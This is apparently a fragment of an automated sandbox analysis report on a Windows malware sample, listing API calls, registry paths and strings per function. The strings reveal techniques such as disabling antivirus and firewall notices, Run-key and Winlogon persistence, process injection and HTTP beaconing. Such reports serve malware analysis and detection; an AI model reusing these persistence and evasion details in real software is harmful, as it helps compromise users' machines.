                                                                                                                                                                                                              • RegCreateKeyExA.ADVAPI32(80000002,SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced,00000000,00000000,00000000,000F003F,00000000,?,00000000), ref: 004062DF
                                                                                                                                                                                                              • RegQueryValueExA.ADVAPI32(?,g00d d0gg,00000000,00000000,?,?,?,?,00000000,?,00000000), ref: 0040631D
                                                                                                                                                                                                              • RegSetValueExA.ADVAPI32(?,g00d d0gg,00000000,00000004,?,00000004,?,?,?,?,?,?,00000000,?,00000000), ref: 00406356
                                                                                                                                                                                                              • RegDeleteValueA.ADVAPI32(?,g00d d0gg,?,?,?,?,?,?,00000000,?,00000000), ref: 0040636F
                                                                                                                                                                                                              • Sleep.KERNEL32(00001388,g00d d0gg,?,?,?,?,?,?,00000000,?,00000000), ref: 0040637C
                                                                                                                                                                                                              • RtlAdjustPrivilege.NTDLL(00000013,00000001,00000000,?), ref: 0040639B
                                                                                                                                                                                                              • NtShutdownSystem.NTDLL(00000001), ref: 004063A6
                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,00000000,?,00000000), ref: 004063CA
                                                                                                                                                                                                              • CloseHandle.KERNEL32(?), ref: 004063E1
                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(?,?,?,?,00412170,?,?,?,0040F4FC,?,00000000), ref: 004063F8
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,qnd_b__-13), ref: 00406409
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1354426262.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1354413062.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1354440542.0000000000407000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1354454729.0000000000410000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1354467496.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1354482959.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: File$Close$Create$Value$Handle$AddressProclstrcat$Attributes$Process$lstrlen$DeleteOpenWritelstrcpy$EnvironmentExpandStrings$CurrentLibraryLoadQuerySystemTempTime$DirectoryErrorLastNameObjectProcess32SingleWaitlstrcmpiwsprintf$ExitMutexPathReadSleepStartupThread$AdjustFirstInfoInformationNextPointerPrivilegeSizeSnapshotTokenToolhelp32$ClassCommandComputerCountEnumHeapLineModulePriorityShutdownTerminateTickVersion
                                                                                                                                                                                                              • String ID: %02X$%AppData%\$%ComSpec%$%CommonProgramFiles%\System\$--k33p$.dll$.exe$AntiVirusDisableNotify$AntiVirusOverride$Both$CLSID\{F1ACE452-91D3-FF14-6B60-AD3718D5C8FC}\InProcServer32$CreateRemoteThread$DLLName$Debugger$Default Flags$Extended Flags$FirewallDisableNotify$GetIpAddrTable$InternetCloseHandle$InternetOpenA$InternetOpenUrlA$InternetReadFile$InternetSetOptionA$IsInstalled$NoAutoUpdate$NtAllocateVirtualMemory$NtOpenProcessToken$NtQueryInformationToken$NtShutdownSystem$NtWriteVirtualMemory$P||$QlC5hT0yHn63XEm5LqJ2OxSkGj2v$RasEnumConnectionsA$RtlAdjustPrivilege$SOFTWARE\Microsoft\Active Setup\Installed Components\$SOFTWARE\Microsoft\Security Center$SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\explorer.exe$SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\{BC84DF00-BC38-9902-8082-6FCBF2D87A0B}$SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced$SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{F1ACE452-91D3-FF14-6B60-AD3718D5C8FC}$SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU$SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List$ShellRegEx$Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connection Policy$Software\Microsoft\Windows\CurrentVersion\Run$Startup$StubPath$ThreadingModel$UpdatesDisableNotify$explorer.exe$f$firefox.exe$g00d d0gg$iexplore.exe$iphlpapi.dll$kernel32.dll$mozilla.exe$ntdll.dll$opera.exe$qnd_b__-13$rasapi32.dll$sOfTwaRe\mIcRoSofT\cOdE SToRe dAtAbAsE\Distribution Units\{79AABB1D-FADB-7161-3CCB-997899295A29}$seamonkey.exe$tmp$wininet.dll$winlogon.exe${%02X%02X%02X%02X-%02x%02x-%02x%02x-%02X%02X-%02X%02X%02X%02X%02x%02x}${10F5781A-0D97-0F99-EF77-BA382916E579}${4D415259-4a4f-4e45-5334-4D4152594a4f}${9703941E-446E-952F-954A-3DA8A91ED84F}$}|
                                                                                                                                                                                                              • API String ID: 1618137752-39698364
                                                                                                                                                                                                              • Opcode ID: 7795afdd26422b98606130c06c03d0fcc75b2a593c07fc7c1f629372ddbf79cd
                                                                                                                                                                                                              • Instruction ID: fcd3a91cfab7fa25ee27508f4df0295c9928967f58dd1d1f7e7acfc0775f1f2c
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7795afdd26422b98606130c06c03d0fcc75b2a593c07fc7c1f629372ddbf79cd
                                                                                                                                                                                                              • Instruction Fuzzy Hash: D1233BB19443406AE630B6349D47F9B3A989B40318F140A3FFA89B61D3E77C9529C79F
                                                                                                                                                                                                              Function 0040151E Relevance: 15.1, APIs: 10, Instructions: 92fileCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,004049C8,?,00000100,?,?,00000104), ref: 00401549
                                                                                                                                                                                                              • SetFileAttributesA.KERNEL32(?,00000080,?,?,?,?,?,00000100,?,?,00000104), ref: 0040156D
                                                                                                                                                                                                              • CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,?,?,?,?,?,?,?,?,00000100), ref: 00401588
                                                                                                                                                                                                              • ReadFile.KERNEL32(00000000,?,00001000,?,00000000,?,?,?,?,?,?,00000080,00000000), ref: 004015F1
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000080,00000000), ref: 00401601
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000080,00000000), ref: 00401607
                                                                                                                                                                                                              • DeleteFileA.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000080), ref: 0040160D
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1354426262.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1354413062.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1354440542.0000000000407000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1354454729.0000000000410000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1354467496.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1354482959.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: File$CloseCreateHandle$AttributesDeleteRead
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3513576528-0
                                                                                                                                                                                                              • Opcode ID: 6edca4130fc9ff9253b416a2a54cfdd097daa11b75cfe95610963849548db182
                                                                                                                                                                                                              • Instruction ID: ead9107263b76718dec6335517b8b67c7343bef8d8983c19364d90e74fa0285a
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6edca4130fc9ff9253b416a2a54cfdd097daa11b75cfe95610963849548db182
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8021A1B1A802007AE53031757C03F5B369C8B84758F190A3BFE06B91D6F5BDE62941AF

                                                                                                                                                                                                              Non-executed Functions

                                                                                                                                                                                                              Function 0040355D Relevance: 35.5, APIs: 16, Strings: 4, Instructions: 493networkregistrysleepCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • lstrcpyA.KERNEL32(?,?,?,?,?,?,?,0040F4FC,?,00000000,?,?,?,0040F4FC,?,00000000), ref: 004029F2
                                                                                                                                                                                                              • gethostbyname.WS2_32(?), ref: 00402A11
                                                                                                                                                                                                              • htons.WS2_32(00000050), ref: 00402A30
                                                                                                                                                                                                              • socket.WS2_32(00000002,00000001,00000006), ref: 00402A5B
                                                                                                                                                                                                              • closesocket.WS2_32(00000000), ref: 00402A84
                                                                                                                                                                                                              • GetSystemTimeAsFileTime.KERNEL32(?), ref: 00403920
                                                                                                                                                                                                              • RegSetValueExA.ADVAPI32(?,Default Flags,00000000,00000003,00412170,00000012), ref: 004039CD
                                                                                                                                                                                                              • RegSetValueExA.ADVAPI32(?,Default Flags,00000000,00000003,00412170,00000012), ref: 004039EE
                                                                                                                                                                                                              • Sleep.KERNEL32(000927C0,?,?,?,?,?,?,?,?,?,?,?,0040F4FC,?,00000000), ref: 00403A0C
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1354426262.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1354413062.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1354440542.0000000000407000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1354454729.0000000000410000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1354467496.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1354482959.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: TimeValue$FileSleepSystemclosesocketgethostbynamehtonslstrcpysocket
                                                                                                                                                                                                              • String ID: %u.%u.%u.%s$Default Flags$isdn$modem
                                                                                                                                                                                                              • API String ID: 1870287861-1479823086
                                                                                                                                                                                                              • Opcode ID: 96acd3ec43a28ade2448771fe3d395cccea34a43eb763a718d322ee28eed03fa
                                                                                                                                                                                                              • Instruction ID: 2ee653d2f7df55df6907a0a9b2e57412953aa95c4ecf6cadf6b3b4d2485eddb3
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 96acd3ec43a28ade2448771fe3d395cccea34a43eb763a718d322ee28eed03fa
                                                                                                                                                                                                              • Instruction Fuzzy Hash: E412D3B0A002149FDB20EF28CD45B997BB5AF45304F1482FAE808B73D1D7799A85CF59
                                                                                                                                                                                                              Function 004019AA Relevance: 26.5, APIs: 14, Strings: 1, Instructions: 229processCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 004019BF
                                                                                                                                                                                                              • Process32First.KERNEL32(00000000,?), ref: 00401A0A
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 00401C12
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1354426262.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1354413062.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1354440542.0000000000407000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1354454729.0000000000410000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1354467496.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1354482959.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CloseCreateFirstHandleProcess32SnapshotToolhelp32
                                                                                                                                                                                                              • String ID: T2A
                                                                                                                                                                                                              • API String ID: 1083639309-2019523081
                                                                                                                                                                                                              • Opcode ID: 1e948c95aaa689c1ab19c458318ec14d1cde759feb862ccd8d81315eded4b2f4
                                                                                                                                                                                                              • Instruction ID: 7c6136f779b091b801ec7ced044d4ecd4f532b5644714f746006db05a6c2f320
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1e948c95aaa689c1ab19c458318ec14d1cde759feb862ccd8d81315eded4b2f4
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 627108706482009BE710AB24DD41B9B3BB8AB45348F04453AF945E72E1F37CE669CB9A
                                                                                                                                                                                                              Function 0040263A Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 123filenetworkCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • InternetReadFile.WININET(?,00000000,00000100,?), ref: 0040265C
                                                                                                                                                                                                              • select.WS2_32(00000000,?,00000000,00000000,?), ref: 004026B1
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1354426262.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1354413062.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1354440542.0000000000407000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1354454729.0000000000410000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1354467496.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1354482959.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: FileInternetReadselect
                                                                                                                                                                                                              • String ID: (
                                                                                                                                                                                                              • API String ID: 1501673908-3887548279
                                                                                                                                                                                                              • Opcode ID: 90583d2b313c707988cabef44d03dce10f4e52a7c9587c3868e69efa36d07d23
                                                                                                                                                                                                              • Instruction ID: 6522e2537fb8c8e721883018bf3c6a7a4605c561a93ab5d2b210f47b7f02e7dc
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 90583d2b313c707988cabef44d03dce10f4e52a7c9587c3868e69efa36d07d23
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 094172341083859BD3318F24C588BEBFBE4EB89314F24492FD8D9972C2D3B99865CB56
                                                                                                                                                                                                              Function 00402030 Relevance: 37.0, APIs: 16, Strings: 5, Instructions: 234networkstringCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • lstrcpyA.KERNEL32(?,?), ref: 00402065
                                                                                                                                                                                                              • lstrlenA.KERNEL32(00000000,?), ref: 0040206E
                                                                                                                                                                                                              • htons.WS2_32(00000000), ref: 004020C9
                                                                                                                                                                                                              • inet_addr.WS2_32(?), ref: 004020F0
                                                                                                                                                                                                              • gethostbyname.WS2_32(?), ref: 00402107
                                                                                                                                                                                                              • socket.WS2_32(00000002,00000001,00000006), ref: 0040213E
                                                                                                                                                                                                              • closesocket.WS2_32(00000000), ref: 00402169
                                                                                                                                                                                                              • wsprintfA.USER32 ref: 004021B5
                                                                                                                                                                                                              • send.WS2_32(00000000,?,00000000,00000000), ref: 004021C5
                                                                                                                                                                                                              • lstrcmpiA.KERNEL32(?,HTTP/1.0 200), ref: 00402206
                                                                                                                                                                                                              • InternetOpenA.WININET(Mozilla/4.0 (compatible; MSIE 6.0; Win32),00000004,00000000,00000000,00000000), ref: 0040229C
                                                                                                                                                                                                              • InternetSetOptionA.WININET(00000000,00000002,00009C40,00000004), ref: 004022BF
                                                                                                                                                                                                              • InternetSetOptionA.WININET(00000000,00000006,00009C40,00000004), ref: 004022CB
                                                                                                                                                                                                              • InternetSetOptionA.WININET(00000000,00000005,00009C40,00000004), ref: 004022D7
                                                                                                                                                                                                              • InternetOpenUrlA.WININET(00000000,?,00000000,00000000,84280300,00000000), ref: 004022F2
                                                                                                                                                                                                              • InternetCloseHandle.WININET(00000000), ref: 00402336
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              • Mozilla/4.0 (compatible; MSIE 6.0; Win32), xrefs: 00402297
                                                                                                                                                                                                              • 0, xrefs: 004021EF
                                                                                                                                                                                                              • HTTP/1.0 200, xrefs: 00402200
                                                                                                                                                                                                              • GET /%s HTTP/1.0Host: %s:%uUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0), xrefs: 00402183
                                                                                                                                                                                                              • GET /%s HTTP/1.0Host: %sUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0), xrefs: 0040217C
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1354426262.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1354413062.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1354440542.0000000000407000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1354454729.0000000000410000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1354467496.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1354482959.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Internet$Option$Open$CloseHandleclosesocketgethostbynamehtonsinet_addrlstrcmpilstrcpylstrlensendsocketwsprintf
                                                                                                                                                                                                              • String ID: 0$GET /%s HTTP/1.0Host: %sUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0)$GET /%s HTTP/1.0Host: %s:%uUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0)$HTTP/1.0 200$Mozilla/4.0 (compatible; MSIE 6.0; Win32)
                                                                                                                                                                                                              • API String ID: 326340279-182194581
                                                                                                                                                                                                              • Opcode ID: c5914518efa31e6daf1d6d1c5ad6aede4384d13f612d860edefc583a5bee64dd
                                                                                                                                                                                                              • Instruction ID: 67f1582d9d65064009b7b38dedaf8d45dcb20af8a74f6ab8ff9eb660a5d02e62
                                                                                                                                                                                                              • Opcode Fuzzy Hash: c5914518efa31e6daf1d6d1c5ad6aede4384d13f612d860edefc583a5bee64dd
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 83810DB0E002045BD710AB749E49B5F76B8AB05314F0441B6EB05FB2D1E7FC9A59C79E
                                                                                                                                                                                                              Function 004038AA Relevance: 33.6, APIs: 15, Strings: 4, Instructions: 306networksleepregistryCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • lstrcpyA.KERNEL32(?,?,?,?,?,?,?,0040F4FC,?,00000000,?,?,?,0040F4FC,?,00000000), ref: 004029F2
                                                                                                                                                                                                              • gethostbyname.WS2_32(?), ref: 00402A11
                                                                                                                                                                                                              • htons.WS2_32(00000050), ref: 00402A30
                                                                                                                                                                                                              • socket.WS2_32(00000002,00000001,00000006), ref: 00402A5B
                                                                                                                                                                                                              • closesocket.WS2_32(00000000), ref: 00402A84
                                                                                                                                                                                                              • Sleep.KERNEL32(00000000), ref: 004038FD
                                                                                                                                                                                                              • GetSystemTimeAsFileTime.KERNEL32(?), ref: 00403920
                                                                                                                                                                                                              • RegSetValueExA.ADVAPI32(?,Default Flags,00000000,00000003,00412170,00000012), ref: 004039CD
                                                                                                                                                                                                              • RegSetValueExA.ADVAPI32(?,Default Flags,00000000,00000003,00412170,00000012), ref: 004039EE
                                                                                                                                                                                                              • Sleep.KERNEL32(000927C0,?,?,?,?,?,?,?,?,?,?,?,0040F4FC,?,00000000), ref: 00403A0C
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1354426262.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1354413062.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1354440542.0000000000407000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1354454729.0000000000410000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1354467496.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1354482959.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: SleepTimeValue$FileSystemclosesocketgethostbynamehtonslstrcpysocket
                                                                                                                                                                                                              • String ID: %u.%u.%u.%s$Default Flags$isdn$modem
                                                                                                                                                                                                              • API String ID: 104937078-1479823086
                                                                                                                                                                                                              • Opcode ID: 23bc219b5744c9827f2f8f9d690f39e8be89f3e5c2ca0e4ade555a46899b0d44
                                                                                                                                                                                                              • Instruction ID: 51207a69c6f84e7cd26efe5e5962b9edc78a43a6ad57510283d07de6baf8f7fe
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 23bc219b5744c9827f2f8f9d690f39e8be89f3e5c2ca0e4ade555a46899b0d44
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 94C12C71A002149BDB20DF38CD49BD977B5AF44304F1082B6E509F72D1E7B99A58CF5A
                                                                                                                                                                                                              Function 004016E1 Relevance: 29.9, APIs: 12, Strings: 5, Instructions: 144registrystringCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • RegCreateKeyExA.ADVAPI32(80000001,Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections,00000000,00000000,00000000,000F003F,00000000,?,00000000,?,?,0040228C), ref: 00401720
                                                                                                                                                                                                              • lstrlenA.KERNEL32(?,?,?,00001000,00000000,?,00000000,?,?,0040228C), ref: 00401751
                                                                                                                                                                                                              • lstrcatA.KERNEL32(?,\Software\Microsoft\Windows\CurrentVersion\Internet Settings,?,?,?,?,?,?,?,00001000,00000000,?,00000000,?,?,0040228C), ref: 0040177F
                                                                                                                                                                                                              • RegOpenKeyExA.ADVAPI32(80000003,00000000,00000000,00020019,?,\Software\Microsoft\Windows\CurrentVersion\Internet Settings,?,?,?,?,?,?,?,00001000,00000000,?), ref: 00401795
                                                                                                                                                                                                              • RegQueryValueExA.ADVAPI32(?,ProxyEnable,00000000,?,?,?,?,?,?,00020019,?,\Software\Microsoft\Windows\CurrentVersion\Internet Settings), ref: 004017D2
                                                                                                                                                                                                              • RegOpenKeyExA.ADVAPI32(?,Connections,00000000,00020019,?,?,?,?,?,?,?,?,?,00020019,?,\Software\Microsoft\Windows\CurrentVersion\Internet Settings), ref: 00401817
                                                                                                                                                                                                              • RegEnumValueA.ADVAPI32(?,?,?,?,00000000,?,?,00001000), ref: 0040189E
                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(?), ref: 004018BD
                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,00020019,?,\Software\Microsoft\Windows\CurrentVersion\Internet Settings), ref: 004018CF
                                                                                                                                                                                                              • RegEnumKeyA.ADVAPI32(80000003,?,?,00001000), ref: 004018E8
                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,00001000,00000000,?,00000000,?,?,0040228C), ref: 004018FF
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              • _Classes, xrefs: 00401762
                                                                                                                                                                                                              • \Software\Microsoft\Windows\CurrentVersion\Internet Settings, xrefs: 00401779
                                                                                                                                                                                                              • ProxyEnable, xrefs: 004017C6
                                                                                                                                                                                                              • Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections, xrefs: 00401716
                                                                                                                                                                                                              • Connections, xrefs: 0040180B
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1354426262.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1354413062.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1354440542.0000000000407000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1354454729.0000000000410000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1354467496.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1354482959.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Close$EnumOpenValue$CreateQuerylstrcatlstrlen
                                                                                                                                                                                                              • String ID: Connections$ProxyEnable$Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections$\Software\Microsoft\Windows\CurrentVersion\Internet Settings$_Classes
                                                                                                                                                                                                              • API String ID: 1447802672-1466506419
                                                                                                                                                                                                              • Opcode ID: f294c517c20514b2f8faf26ffca72a768d62fae29f0f9d7abf442c73c3c025a1
                                                                                                                                                                                                              • Instruction ID: 66e194334fdec41dc41c183a83ee0e0423d2cbbda799cea80f6bf4481fa86f55
                                                                                                                                                                                                              • Opcode Fuzzy Hash: f294c517c20514b2f8faf26ffca72a768d62fae29f0f9d7abf442c73c3c025a1
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2941EEB2904344AAF73176219C0AF9B7B9C9B44348F14443FFE88B51D3E279962CC667
                                                                                                                                                                                                              Function 00401439 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 70registryCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced,00000000,0002001F,?,?,?,?,?,?,?,?,?,004053DB), ref: 00401455
                                                                                                                                                                                                              • RegQueryValueExA.ADVAPI32(?,ShellRegEx,00000000,?,?,?,?,?,?,0002001F,?), ref: 00401482
                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,0002001F,?), ref: 0040149E
                                                                                                                                                                                                              • RegOpenKeyExA.ADVAPI32(80000001,SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced,00000000,0002001F,?,?,?,?,?,0002001F,?), ref: 004014BF
                                                                                                                                                                                                              • RegQueryValueExA.ADVAPI32(?,ShellRegEx,00000000,?,?,?,?,?,?,0002001F,?,?,?,?,?,0002001F), ref: 004014F3
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1354426262.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1354413062.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1354440542.0000000000407000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1354454729.0000000000410000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1354467496.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1354482959.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: OpenQueryValue$Close
                                                                                                                                                                                                              • String ID: SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced$ShellRegEx
                                                                                                                                                                                                              • API String ID: 2529929805-3421572904
                                                                                                                                                                                                              • Opcode ID: 4a95097c5cd9ac49c2c0031509204a62f35eae4208d5cebb0b882de0ceae9e8d
                                                                                                                                                                                                              • Instruction ID: 4b3f21838edb9e41f667f6993cf98c5a1242fec43926aa3cdaef8ebd8d2009fd
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4a95097c5cd9ac49c2c0031509204a62f35eae4208d5cebb0b882de0ceae9e8d
